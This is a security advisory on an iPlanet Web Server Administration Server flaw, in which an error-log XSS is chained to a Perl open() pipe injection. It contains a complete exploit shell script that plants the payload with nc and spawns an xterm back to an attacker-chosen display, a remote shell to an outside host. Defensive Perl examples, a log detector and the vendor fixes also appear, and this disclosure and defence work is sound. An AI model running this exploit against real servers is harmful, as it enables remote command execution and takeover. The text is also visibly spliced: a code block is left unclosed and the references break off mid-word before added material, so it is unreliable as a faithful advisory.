iPlanet Administration Server insecure open() call vulnerability

Published: 2002-11-19
Updated: 2003-01-08
Severity: High
Threat: Remote administrator privileges
Error type: Design error
Exploit mode: server-side
BUGTRAQ ID: 6203

Affected systems
iPlanet E-Commerce Solutions iPlanet Web Server 4.1 SP9

Detailed description
iPlanet Web Server contains a command execution vulnerability caused by an insecure call to Perl's open(). The flaw lies in a Perl CGI script of the Administration Server (https-admserv). Exploiting it runs commands on the server with the privileges of the web server process that hosts the Administration Server.

iPlanet Web Server also contains a cross-site scripting (XSS) vulnerability that is triggered when an administrator views the error log through the Administration Server. Text that an anonymous client causes to be written to the error log (for example, a request for a non-existent URL containing script tags) is rendered unescaped in the administrator's browser as soon as the administrator has logged in to the Administration Server and opens the log viewer.

The open() flaw by itself is only reachable by an authenticated administrator, so the key to remote exploitation is not to call the Perl CGI directly but to use the XSS to redirect the administrator's already-authenticated browser to a URL that hijacks the open() call.

Test code
<script>
window.location="/https-admserv/bin/perl/importInfo?dir=|<command>%00";
</script>

The dir parameter ends up in a two-argument open(): a leading "|" makes Perl open a pipe to the rest of the string as a shell command, and the URL-encoded NUL byte (%00) terminates the string at the C level, discarding whatever the script appends after the parameter.

Exploit:
#!/bin/sh
#
# iPlanet Remote root exploit
# Tested versions: 4.* up to SP11
#
# By: Fermín J. Serna CTO, NGSEC
# http://www.ngsec.com <fjserna@ngsec.com>
#
# Madrid, 09/10/2002
#
# Flow: plant an XSS payload in the target's error log by requesting a
# non-existent URL, then wait for an administrator to view the error log
# in the Administration Server. The payload redirects the administrator's
# authenticated browser to importInfo, whose dir parameter reaches Perl
# open() as a pipe, spawning an xterm back to the attacker's X display.

echo "iPlanet (4.* up to SP11) Remote root exploit by Fermin J. Serna CTO, NGSEC"
echo "http://www.ngsec.com <fjserna@ngsec.com>"
echo

if [ "$#" -ne 3 ]
then
    echo "Usage: $0 <Web_Server> <Web_port> <IP_to_send_xterm>"
    exit 1
fi

# The target will connect back to our X display, so allow its address.
echo "1.- Setting xhost +$1"
xhost +"$1"
echo

# %3F and %2500 are decoded once by the web server before the URL is
# written to the error log, leaving "?" and "%00" in the logged entry;
# the administrator's browser then sends "%00" to the CGI, which decodes
# it to a NUL byte. "+" becomes a space in the CGI's query parsing.
echo "2.- Building XSS string:"
CADENA="<script>window.location=\"/https-admserv/bin/perl/importInfo%3Fdir=|/usr/openwin/bin/xterm+-display+$3:0%2500\";</script>"
echo "$CADENA"
echo

# Request a URL that does not exist so the payload lands in the error log.
echo "3.- Sending HTTP request:"
SEND="GET /$CADENA HTTP/1.0"
echo "$SEND"
(echo "$SEND"; echo "Host: $1"; echo; echo) | nc "$1" "$2"
echo
echo

echo "4.- Time to wait for the xterm :P. Admin should review Web Server logs using Admin Server Tool."
echo
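To make the open() mechanism concrete, here is an added Perl illustration. It is not the importInfo CGI's real code; the $BASE directory, the import.dat filename and the shape of the vulnerable function are assumptions made for the example. It contrasts the two-argument open() pattern, in which the dir parameter gets to choose the open mode, with a three-argument open() behind a whitelist, and models how two-argument open() classifies the advisory's payload once the C layer has truncated it at the NUL byte.

```perl
#!/usr/bin/perl
# Added illustration (not the importInfo CGI's actual code): how a
# two-argument open() turns a CGI parameter into a command, and how a
# three-argument open() plus input validation closes the hole.
use strict;
use warnings;

my $BASE = '/tmp/importinfo-demo';   # assumed import directory, not the real one

# Vulnerable pattern: the value of "dir" is interpolated into the single
# argument of open(). Perl parses the mode out of that string itself, so
# a leading "|" means "run the rest as a shell command and write to it".
sub open_import_file_vulnerable {
    my ($dir) = @_;
    my $spec = "$dir/import.dat";          # the string open() would see
    ## open(my $fh, $spec) or die "$!";    # for dir=|<command>\0 this spawns <command>
    return $spec;
}

# Simplified model of how two-argument open() classifies its argument
# (see perlopentut). The NUL step mirrors the C layer: the string ends at
# the first \0, so "|xterm ...\0/import.dat" becomes just "|xterm ...".
sub classify_two_arg_open {
    my ($spec) = @_;
    $spec = $1 if $spec =~ /^([^\0]*)\0/;  # C string truncation at NUL
    return ('pipe_to_command',   $1) if $spec =~ /^\s*\|\s*(.*)$/;
    return ('pipe_from_command', $1) if $spec =~ /^(.*?)\s*\|\s*$/;
    return ('append',            $1) if $spec =~ /^\s*>>\s*(.*)$/;
    return ('write',             $1) if $spec =~ /^\s*>\s*(.*)$/;
    return ('read',              $1) if $spec =~ /^\s*<\s*(.*)$/;
    return ('read',              $spec);
}

# Whitelist: one path component of safe characters. The first-character
# class rules out ".", "..", "|", "/" and NUL, so no mode prefix, pipe or
# directory traversal can survive.
sub safe_dir_name {
    my ($dir) = @_;
    return defined $dir && $dir =~ /\A[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}\z/;
}

# Hardened pattern: validate first, then use the three-argument form so
# the mode ('<') can never come from the request.
sub open_import_file_hardened {
    my ($dir) = @_;
    die "rejected dir parameter\n" unless safe_dir_name($dir);
    my $path = "$BASE/$dir/import.dat";
    open(my $fh, '<', $path) or die "cannot open $path: $!\n";
    return $fh;
}

# Demo with the advisory's payload shape (constructed; the command is never run).
my $payload = "|/usr/openwin/bin/xterm -display 10.0.0.1:0\0";
my ($mode, $target) = classify_two_arg_open(open_import_file_vulnerable($payload));
print "two-arg open() would: $mode => '$target'\n";

for my $dir ($payload, '../../etc', 'site1') {
    my $shown = $dir;
    $shown =~ s/\0/\\0/g;
    printf "safe_dir_name('%s') = %s\n", $shown, safe_dir_name($dir) ? 'yes' : 'no';
}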
Solution
Sun provides the following workaround:

Edit the files index.lst and nescore.spm, which are found in the following directories:
<SERVER ROOT>/https/admin/html
<SERVER ROOT>/https/httpadmin/html

Add a semicolon ";" in front of these lines:
--Option:viewacc,View Access Log
--Option:viewerr,View Error Log

This comments the lines out and removes the Administration Server's log-viewing function, the page through which the XSS is triggered. Restart the server to make sure the new configuration takes effect. Note that the workaround only closes the delivery path: the insecure open() in the Perl CGI is unchanged and remains reachable by an authenticated administrator, so the vendor upgrade should still be applied. The exploit above states it was tested against 4.* up to SP11 while the upgrade list below names 4.1 SP11 as the fix; confirm the exact fixed release against Sun Alert 49475, linked under Related information.

Or download the patch:

iPlanet E-Commerce Solutions iPlanet Web Server Enterprise Edition 4.0, 4.0 SP1, 4.0 SP2, 4.0 SP3, 4.0 SP4, 4.0 SP5, 4.0 SP6:
Upgrade: Sun ONE Web Server 4.1 SP11
http://wwws.sun.com/software/download/download/5292.html

iPlanet E-Commerce Solutions iPlanet Web Server 4.1, 4.1 SP1, 4.1 SP2, 4.1 SP3, 4.1 SP4, 4.1 SP5, 4.1 SP6, 4.1 SP7, 4.1 SP8, 4.1 SP9, 4.1 SP10:
Upgrade: Sun ONE Web Server 4.1 SP11
http://wwws.sun.com/software/download/download/5292.html

Sun ONE Web Server 6.0, 6.0 SP1:
Upgrade: Sun ONE Web Server 6.0 SP2
http://wwws.sun.com/software/download/download/5126.html

Related information
Related links:
iPlanet WebServer, remote root compromise
http://online.securityfocus.com/archive/1/300451
Free Sun Alert Notifications Article 49475 (Sun Microsystems)
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F49475
Sun[tm] ONE W
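Alongside the workaround and upgrade above, a practitioner will want to confirm the encoding chain the exploit relies on and check whether an error log already holds poisoned entries that the log viewer would render. The following Perl script is an added example, not part of the advisory or of Sun's tooling; the iPlanet-like error-log line format, the host addresses and the attacker display address are constructed for illustration.

```perl
#!/usr/bin/perl
# Added example (not part of the advisory or of Sun's tooling): replay the
# encoding steps of the attack chain and scan error-log lines for the
# poisoned entries that the Administration Server's log viewer would render.
use strict;
use warnings;

# One round of percent-decoding, as the web server applies to the request
# URI before writing a "can't find" entry to the error log.
sub url_decode {
    my ($s) = @_;
    $s =~ s/%([0-9A-Fa-f]{2})/chr hex $1/ge;
    return $s;
}

# Query-string decoding as a CGI does it: "+" is a space and a second
# percent-decode turns "%00" into a real NUL byte.
sub query_param {
    my ($uri, $name) = @_;
    my ($qs) = $uri =~ /\?(.*)\z/ or return undef;
    for my $pair (split /&/, $qs) {
        my ($k, $v) = split /=/, $pair, 2;
        next unless defined $v && $k eq $name;
        $v =~ tr/+/ /;
        return url_decode($v);
    }
    return undef;
}

# Step 1: the request the exploit sends (built from the advisory's payload).
my $sent = '/<script>window.location="/https-admserv/bin/perl/importInfo%3Fdir=|/usr/openwin/bin/xterm+-display+10.0.0.1:0%2500";</script>';
# Step 2: what lands in the error log after one decode ("?" and "%00" are now literal).
my $logged = url_decode($sent);
# Step 3: what the CGI receives once the administrator's browser follows the redirect.
my ($redirect) = $logged =~ /window\.location="([^"]+)"/;
my $dir = query_param($redirect, 'dir');

# Detector: flag error-log lines carrying markup or script, or a reference
# to the vulnerable CGI whose dir value starts with a pipe or carries %00.
sub poisoned_log_line {
    my ($line) = @_;
    return 1 if $line =~ /<\s*script\b|javascript:|\bon\w+\s*=/i;
    return 1 if $line =~ m{/https-admserv/bin/perl/importInfo\?[^ ]*\bdir=(?:\||%7C|[^& ]*%00)}i;
    return 0;
}

# Constructed sample lines in an iPlanet-like error-log format (illustrative only).
my @log = (
    '[09/Oct/2002:10:12:01] info ( 2345): successful server startup',
    "[09/Oct/2002:10:15:43] warning ( 2345): for host 192.0.2.7 trying to GET $logged, send-file reports: HTTP4142: can't find /docs$logged (File not found)",
    '[09/Oct/2002:10:16:02] warning ( 2345): for host 192.0.2.8 trying to GET /robots.txt, send-file reports: HTTP4142: can\'t find /docs/robots.txt (File not found)',
);

my @hits = grep { poisoned_log_line($_) } @log;
my $shown = $dir;
$shown =~ s/\0/\\0/g;
print "logged entry after one decode: $logged\n";
print "dir parameter the CGI receives: $shown\n";
printf "%d of %d log lines flagged as poisoned\n", scalar @hits, scalar @log;
```

The first regex catches the generic case (any markup or event handler written into the log); the second is specific to this advisory's CGI and is useful for confirming that a flagged entry actually targeted the open() call rather than some other XSS sink.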